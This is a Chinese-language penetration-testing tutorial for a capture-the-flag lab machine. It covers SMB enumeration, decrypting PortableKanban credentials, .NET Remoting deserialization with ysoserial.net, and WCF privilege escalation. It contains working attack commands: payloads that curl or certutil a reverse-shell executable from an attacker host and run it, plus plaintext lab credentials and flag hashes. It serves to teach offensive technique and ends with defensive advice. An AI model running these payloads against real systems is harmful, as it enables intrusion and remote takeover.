Sharp SMB + PortableKanban + .NET-RE + WCF 渗透测试教学文档<\/h1>

1. 信息收集<\/h2>

1.1 主机发现与端口扫描<\/h3>
# 检查目标主机是否在线<\/span>
<\/span><\/span>ip=<\/span>'10.10.10.219'<\/span>
<\/span><\/span>itf=<\/span>'tun0'<\/span>
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>
<\/span><\/span>    # 使用masscan进行快速端口扫描<\/span>
<\/span><\/span>    ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>    if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>        echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>
<\/span><\/span>        # 使用nmap进行详细服务扫描<\/span>
<\/span><\/span>        nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>
<\/span><\/span>    else<\/span>
<\/span><\/span>        echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>
<\/span><\/span>    fi<\/span>
<\/span><\/span>else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>1.2 端口扫描结果分析<\/h3>
发现开放端口：<\/p>

135\/tcp: Microsoft RPC<\/li>
139\/tcp: NetBIOS-SSN<\/li>
445\/tcp: SMB文件共享<\/li>
5985\/tcp: WinRM (HTTP API)<\/li>
8888\/tcp: StorageCraft Image Manager<\/li>
8889\/tcp: .NET Message Framing<\/li>
<\/ul>
2. SMB枚举与PortableKanban解密<\/h2>
2.1 SMB共享发现<\/h3>
# 匿名枚举SMB共享<\/span>
<\/span><\/span>smbmap -H 10.10.10.219
<\/span><\/span>
<\/span><\/span># 访问kanban共享<\/span>
<\/span><\/span>smbclient -N \/\/10.10.10.219\/kanban
<\/span><\/span><\/code><\/pre>2.2 PortableKanban配置文件获取<\/h3>
# 下载配置文件<\/span>
<\/span><\/span>smb: \><\/span> wget PortableKanban.pk3
<\/span><\/span><\/code><\/pre>2.3 配置文件解密<\/h3>
# 使用专用解密脚本<\/span>
<\/span><\/span>python3 49409.py PortableKanban.pk3
<\/span><\/span><\/code><\/pre>获取凭据：<\/p>

administrator<\/li>
lars<\/li>
G2@$btRSHJYTarg<\/li>
G123HHrth234gRG<\/li>
<\/ul>
2.4 凭据验证与访问<\/h3>
# 使用CrackMapExec验证凭据<\/span>
<\/span><\/span>crackmapexec smb 10.10.10.219 -u USER -p PASS
<\/span><\/span>
<\/span><\/span># 使用有效凭据访问SMB<\/span>
<\/span><\/span>smbmap -H 10.10.10.219 -u 'lars'<\/span> -p 'G123HHrth234gRG'<\/span>
<\/span><\/span>smbclient -N \/\/10.10.10.219\/dev -U 'lars%G123HHrth234gRG'<\/span>
<\/span><\/span><\/code><\/pre>3. .NET远程服务利用<\/h2>
3.1 服务分析<\/h3>
发现服务端点：SecretSharpDebugApplicationEndpoint<\/code><\/p>

类型过滤器级别：TypeFilterLevel.Full<\/code><\/li>
允许反序列化任意类型，存在反序列化RCE风险<\/li>
认证凭据：username="debug", password="SharpApplicationDebugUserPassword123!"<\/li>
<\/ul>
3.2 利用工具准备<\/h3>

ysoserial.net: .NET反序列化利用工具<\/li>
ExploitRemotingService: .NET Remoting服务利用工具<\/li>
反向shell程序: rev_10.10.16.14_9292.exe<\/li>
<\/ul>
3.3 反向shell生成<\/h3>
\/\/ reverse_win.c 源码
<\/span><\/span><\/span><\/span>#include<\/span> <winsock2.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "ws2_32.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span>*<\/span> argv[]) {
<\/span><\/span>    \/\/ ... 反向shell实现代码 ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译命令：<\/p>
x86_64-w64-mingw32-gcc rev.c -o rev_10.10.16.14_9292.exe -lws2_32
<\/span><\/span><\/code><\/pre>3.4 攻击方法一：直接连接<\/h3>
3.4.1 下载阶段<\/h4>
# 生成下载命令的序列化payload<\/span>
<\/span><\/span>$shell=.\ysoserial.exe -f<\/span> BinaryFormatter -o base64 -g TypeConfuseDelegate -c "curl -o c:\windows\temp\rev_10.10.16.14_9292.exe http:\/\/10.10.16.14\/download_with_token\/4db980844ae74fc086f8efab397956b7"<\/span>
<\/span><\/span>
<\/span><\/span># 执行反序列化攻击<\/span>
<\/span><\/span>.\ExploitRemotingService.exe --user=debug --pass='SharpApplicationDebugUserPassword123!'<\/span> -s tcp:<\/span>\/\/10.10.10.219:<\/span>8888\/SecretSharpDebugApplicationEndpoint raw $shell
<\/span><\/span><\/code><\/pre>3.4.2 执行阶段<\/h4>
# 生成执行命令的序列化payload<\/span>
<\/span><\/span>$shell=.\ysoserial.exe -f<\/span> BinaryFormatter -o base64 -g TypeConfuseDelegate -c "c:\windows\temp\rev_10.10.16.14_9292.exe"<\/span>
<\/span><\/span>
<\/span><\/span># 执行反序列化攻击<\/span>
<\/span><\/span>.\ExploitRemotingService.exe --user=debug --pass='SharpApplicationDebugUserPassword123!'<\/span> -s tcp:<\/span>\/\/10.10.10.219:<\/span>8888\/SecretSharpDebugApplicationEndpoint raw $shell
<\/span><\/span><\/code><\/pre>3.5 攻击方法二：使用SOCAT隧道<\/h3>
3.5.1 建立隧道<\/h4>
# 在攻击机上建立端口转发<\/span>
<\/span><\/span>socat TCP-LISTEN:8888,reuseaddr,fork TCP:10.10.10.219:8888
<\/span><\/span><\/code><\/pre>3.5.2 下载阶段<\/h4>
$shell=.\ysoserial.exe -f<\/span> BinaryFormatter -o base64 -g TypeConfuseDelegate -c "curl -o c:\windows\temp\rev_10.10.16.14_9292.exe http:\/\/10.10.16.14\/download_with_token\/402bc29a788f48689a0c63b2a65affac"<\/span>
<\/span><\/span>.\ExploitRemotingService.exe --user=debug --pass='SharpApplicationDebugUserPassword123!'<\/span> -s tcp:<\/span>\/\/<ATTACK_IP>:<\/span>8888\/SecretSharpDebugApplicationEndpoint raw $shell
<\/span><\/span><\/code><\/pre>3.5.3 执行阶段<\/h4>
$shell=.\ysoserial.exe -f<\/span> BinaryFormatter -o base64 -g TypeConfuseDelegate -c "c:\windows\temp\rev_10.10.16.14_9292.exe"<\/span>
<\/span><\/span>.\ExploitRemotingService.exe --user=debug --pass='SharpApplicationDebugUserPassword123!'<\/span> -s tcp:<\/span>\/\/<ATTACK_IP>:<\/span>8888\/SecretSharpDebugApplicationEndpoint raw $shell
<\/span><\/span><\/code><\/pre>3.6 获取用户权限<\/h3>
成功获取shell后，找到user.txt：<\/p>
d63b93adfef4a515c92e89fd52c65f2c
<\/code><\/pre>
4. 权限提升：WCF服务利用<\/h2>
4.1 WCF服务分析<\/h3>

WCF (Windows Communication Foundation) 是微软的通信框架<\/li>
端口8889运行WCF服务：WcfServer.exe<\/li>
当前用户权限较低，需要提权<\/li>
<\/ul>
4.2 服务权限检查<\/h3>
# 查找8889端口的进程信息<\/span>
<\/span><\/span>$p=(Get-NetTCPConnection -LocalPort 8889 -ErrorAction SilentlyContinue).OwningProcess
<\/span><\/span>if<\/span>(-not<\/span> $p){
<\/span><\/span>    $p=([int]<\/span>((netstat -ano|Select-String ":8889"<\/span>) -split '\s+'<\/span>)[-1])
<\/span><\/span>}
<\/span><\/span>$proc=Get-CimInstance Win32_Process -Filter "ProcessId=$p"<\/span>
<\/span><\/span>$owner=$proc.GetOwner()
<\/span><\/span>[pscustomobject]<\/span>@{
<\/span><\/span>    PID=$p
<\/span><\/span>    ProcessName=$proc.Name
<\/span><\/span>    User=if<\/span>($owner.User){"<\/span>$($owner.Domain)\<\/span>$($owner.User)"<\/span>}else<\/span>{"Unknown"<\/span>}
<\/span><\/span>    Path=$proc.ExecutablePath
<\/span><\/span>    CommandLine=$proc.CommandLine
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 WCF客户端利用<\/h3>
# 上传WCF客户端工具<\/span>
<\/span><\/span>certutil -urlcache -split -f<\/span> "http:\/\/10.10.16.14\/download_with_token\/685a5d1592684e6bb54814e275fd1b49"<\/span> "1757982985365.zip"<\/span>
<\/span><\/span>
<\/span><\/span># 使用WCF客户端执行命令<\/span>
<\/span><\/span>.\WcfClient.exe 127.0.0.1:<\/span>8889 c:\programdata\rev_10.10.16.14_443.exe
<\/span><\/span><\/code><\/pre>4.4 获取系统权限<\/h3>
成功提权后，找到root.txt：<\/p>
38188f3e510ac5f27e962e56b817b363
<\/code><\/pre>
5. 关键工具与资源<\/h2>
5.1 必要工具<\/h3>

ysoserial.net<\/strong>: .NET反序列化利用工具<\/li>
ExploitRemotingService<\/strong>: .NET Remoting服务利用工具<\/li>
CrackMapExec<\/strong>: SMB凭据验证工具<\/li>
SOCAT<\/strong>: 网络隧道工具<\/li>
Mingw-w64<\/strong>: Windows可执行文件编译工具<\/li>
<\/ol>
5.2 资源链接<\/h3>

tolapi项目: https:\/\/github.com\/MartinxMax\/tolapi<\/li>
Chameleon反向shell: https:\/\/raw.githubusercontent.com\/MartinxMax\/Chameleon\/main\/reverseshell\/reverse_win.c<\/li>
<\/ul>
6. 防御建议<\/h2>
6.1 针对反序列化漏洞<\/h3>

设置TypeFilterLevel为Low<\/li>
实现自定义序列化绑定器<\/li>
验证输入数据的合法性<\/li>
<\/ul>
6.2 针对WCF服务<\/h3>

实施适当的权限分离<\/li>
使用传输层安全加密通信<\/li>
定期审计服务配置<\/li>
<\/ul>
6.3 通用安全措施<\/h3>

定期更新和打补丁<\/li>
实施最小权限原则<\/li>
启用日志记录和监控<\/li>
进行定期安全评估<\/li>
<\/ul>
本教学文档详细展示了从信息收集到权限提升的完整渗透测试流程，重点突出了.NET反序列化漏洞和WCF服务的安全问题及利用方法。<\/p>